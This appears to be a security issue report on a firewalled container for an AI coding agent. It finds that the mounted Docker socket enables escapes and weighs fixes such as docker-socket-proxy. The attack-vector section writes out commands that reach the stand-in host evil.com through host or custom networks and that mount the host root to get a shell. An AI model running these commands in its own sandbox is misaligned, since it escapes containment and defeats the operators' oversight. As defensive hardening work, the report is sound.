Priority
Critical
Description
The copilot container has full access to the Docker socket (/var/run/docker.sock), which allows trivial container escapes and firewall bypasses. This fundamentally undermines the security model.
Attack vectors
1. Bypass docker-wrapper directly
/usr/bin/docker-real run --network host alpine wget https://evil.com
2. Create custom network
docker network create bypass-net
docker run --network bypass-net alpine wget https://evil.com
3. Volume mount escape
docker run -v /:/host alpine chroot /host bash
4. Alternative container runtimes
apt-get install podman
podman run --network host alpine wget https://evil.com
Current mitigations (insufficient)
- docker-wrapper.sh intercepts the docker command but is easily bypassed
- Host-level iptables only filter the awf-net bridge, not custom networks
- Wrapper blocks --privileged, --network host, --add-host but can be bypassed
Code locations
src/docker-manager.ts:223-224 - Docker socket mount
containers/copilot/docker-wrapper.sh - Wrapper script (bypassable)
containers/copilot/Dockerfile:34-35 - Symlink setup
Proposed solutions
Option A: Remove Docker socket access (breaking change)
- Pros: Simplest, most secure
- Cons: Breaks MCP servers that need Docker (Playwright, etc.)
- Implementation: Remove socket mount, document that users must spawn Docker-based MCPs outside firewall
Option B: Use docker-socket-proxy
- Pros: Restricts Docker API calls, maintains auto-spawn functionality
- Cons: Adds complexity, still allows network creation
- Implementation: Add a docker-socket-proxy container, configured to block dangerous operations
- Reference: https://github.com/Tecnativa/docker-socket-proxy
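As an added example (not the project's own code) of what Option B looks like: a compose fragment that puts docker-socket-proxy between the real socket and the copilot container, so the copilot side only ever sees DOCKER_HOST over TCP. The copilot image name and the docker-api network name are assumptions; the environment flags are docker-socket-proxy's own API-section switches.

```yaml
# Added example, not code from the project. 1 = allow that Docker API
# section, 0 = deny; most sections not listed default to deny.
services:
  docker-socket-proxy:
    image: tecnativa/docker-socket-proxy
    # The only place the real socket is mounted, and read-only.
    volumes:
      - /var/run/docker.sock:/var/run/docker.sock:ro
    environment:
      # Required so the copilot can still auto-spawn MCP containers.
      CONTAINERS: "1"
      IMAGES: "1"
      POST: "1"
      # Denied: exec into other containers, image builds, volume API,
      # system/info endpoints.
      EXEC: "0"
      BUILD: "0"
      VOLUMES: "0"
      SYSTEM: "0"
      # NETWORKS=0 denies every /networks endpoint, including create.
      # Set to 1 only if the spawner must inspect or connect to awf-net
      # through the API; that is the "still allows network creation"
      # residual gap listed under Cons above.
      NETWORKS: "0"
    networks:
      - docker-api   # internal-only; the proxy is never on awf-net or the host

  copilot:
    image: awf/copilot:local   # assumed image name
    # Replaces the socket bind mount from src/docker-manager.ts: no
    # /var/run/docker.sock exists in this container, so docker-real and
    # any alternative CLI have no socket to reach.
    environment:
      DOCKER_HOST: tcp://docker-socket-proxy:2375
    networks:
      - docker-api
      - awf-net

networks:
  docker-api:
    internal: true   # no egress; only reaches the proxy
  awf-net:
    external: true   # the existing firewalled bridge
```

Caveat: docker-socket-proxy filters by API path, not request body, so with CONTAINERS=1 and POST=1 a container-create request can still carry HostConfig.Binds or Privileged; it does not by itself close vector 3 (volume mount escape), which is why Option C or D is still needed as defense-in-depth.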
Option C: Enforce awf-net for all networks (host-level)
- Pros: Prevents custom network bypass
- Cons: Complex iptables rules, doesn't prevent volume escapes
- Implementation: Add iptables rules to block/filter all Docker networks except awf-net
Option D: AppArmor/SELinux profiles
- Pros: Fine-grained control
- Cons: Very complex, platform-specific
- Implementation: Docker security profiles restricting socket operations
Recommendation
Start with Option A (document limitation) or Option B (docker-socket-proxy) for immediate security. Option C could be additional defense-in-depth.